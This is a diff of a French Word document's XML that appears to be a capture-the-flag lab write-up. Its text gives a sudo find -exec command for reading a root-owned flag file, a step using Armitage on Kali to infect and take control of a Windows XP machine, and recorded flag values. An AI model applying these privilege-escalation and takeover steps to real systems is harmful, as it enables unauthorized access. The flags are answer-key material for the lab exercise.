-        <w:t xml:space="preserve">Utiliser la commande </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>exec</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>find</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pour lancer des commandes en root et pouvoir lire le fichier flag.txt</w:t>
+        <w:t>Utiliser la commande exec de find pour lancer des commandes en root et pouvoir lire le fichier flag.txt</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17419,67 +16528,14 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>find</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flag.txt -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>exec</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cat flag.txt \;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>sudo find flag.txt -exec cat flag.txt \;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17501,7 +16557,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille A : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17511,7 +16566,6 @@
         </w:rPr>
         <w:t>mcGyverIsTheBestManEver</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17653,7 +16707,6 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17663,7 +16716,6 @@
         </w:rPr>
         <w:t>winxp</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17691,27 +16743,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hack - </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Remote</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> control</w:t>
+        <w:t>Hack - Remote control</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17839,7 +16871,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -17886,47 +16918,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Utiliser </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Armitage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sur Kali linux pour infecter la machine </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>xp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et prendre le contrôle et accéder au bureau pour voir le flag</w:t>
+        <w:t>Utiliser Armitage sur Kali linux pour infecter la machine xp et prendre le contrôle et accéder au bureau pour voir le flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17937,7 +16929,6 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17947,19 +16938,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>Flag</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de la faille A : </w:t>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18008,7 +16987,7 @@
     </w:p>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId40"/>
+      <w:footerReference w:type="default" r:id="rId43"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -18021,7 +17000,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -18046,7 +17025,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:sdt>
     <w:sdtPr>
       <w:id w:val="-1868281261"/>
@@ -18055,6 +17034,7 @@
         <w:docPartUnique/>
       </w:docPartObj>
     </w:sdtPr>
+    <w:sdtEndPr/>
     <w:sdtContent>
       <w:p>
         <w:pPr>
@@ -18091,7 +17071,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -18116,8 +17096,8 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
-  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="019B4946"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CC021846"/>
@@ -18206,7 +17186,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="1">
     <w:nsid w:val="1A5574A1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F20694C6"/>
@@ -18319,7 +17299,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="20C73CFC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E9CCE868"/>
@@ -18432,7 +17412,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="29513814"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="FD648CE4"/>
@@ -18545,7 +17525,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="2BF334CD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A7840E56"/>
@@ -18658,7 +17638,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="2D664E8E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="734C98C6"/>
@@ -18771,7 +17751,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="34FD120E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2D4C1A4C"/>
@@ -18884,7 +17864,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="35EC4D13"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4F3AED2C"/>
@@ -18997,7 +17977,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="383E5E6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CCE873C8"/>
@@ -19086,17 +18066,17 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="3FA858A4"/>
+  <w:abstractNum w:abstractNumId="9">
+    <w:nsid w:val="3A521F1E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="D898B890"/>
-    <w:lvl w:ilvl="0" w:tplc="040C0017">
+    <w:tmpl w:val="44DE8E5C"/>
+    <w:lvl w:ilvl="0" w:tplc="D1FE85D2">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%1)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1776" w:hanging="360"/>
+        <w:ind w:left="1065" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -19108,7 +18088,7 @@
       <w:lvlText w:val="%2."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2496" w:hanging="360"/>
+        <w:ind w:left="1785" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2" w:tplc="040C001B" w:tentative="1">
@@ -19117,7 +18097,7 @@
       <w:lvlText w:val="%3."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="3216" w:hanging="180"/>
+        <w:ind w:left="2505" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3" w:tplc="040C000F" w:tentative="1">
@@ -19126,7 +18106,7 @@
       <w:lvlText w:val="%4."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3936" w:hanging="360"/>
+        <w:ind w:left="3225" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4" w:tplc="040C0019" w:tentative="1">
@@ -19135,7 +18115,7 @@
       <w:lvlText w:val="%5."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="4656" w:hanging="360"/>
+        <w:ind w:left="3945" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
